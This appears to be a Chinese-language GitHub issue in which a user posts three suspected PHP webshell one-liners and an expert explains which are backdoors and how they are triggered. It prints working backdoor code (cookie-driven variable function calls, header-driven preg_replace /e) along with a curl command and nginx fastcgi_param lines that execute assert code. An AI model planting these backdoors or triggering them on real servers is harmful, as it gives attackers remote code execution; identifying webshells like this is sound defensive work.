少见的疑似php webshell的两个文件，大牛帮忙分析下。

Question

少见的疑似php webshell的两个文件，大牛帮忙分析下。

Sybille2 opened this issue 6 years ago · comments

之前在你博客留言过，请大牛有时间看看是不是后门文件
代码如下
<?php eval('?>' . file_get_contents('php://stdin'));
<?php extract($_COOKIE);@$F&&@$F($A,$B);
<?php_ @preg_replace($_SERVER['HTTP_X_E10EC8'], $_SERVER['HTTP_X_CURRENT'], ''); ?>`

JoyChou · Answer 1 · Mon Apr 02 2018 12:00:00 GMT+0800 (China Standard Time)

No. 1

第一个不是webshell，这样<?php eval('?>' . file_get_contents('php://input'));才是。

No. 2

可以利用assert变量，进行执行php代码。

具体操作，设置cookie即可。

curl -v -b "F=assert;A=phpinfo();B=test" 'http://127.0.0.1/test.php'

No. 3

拿Nginx举例，修改fastcgi_params参数，添加变量

fastcgi_param  HTTP_X_E10EC8      //e;
fastcgi_param  HTTP_X_CURRENT     assert('phpinfo()');

reload nginx

即可执行phpinfo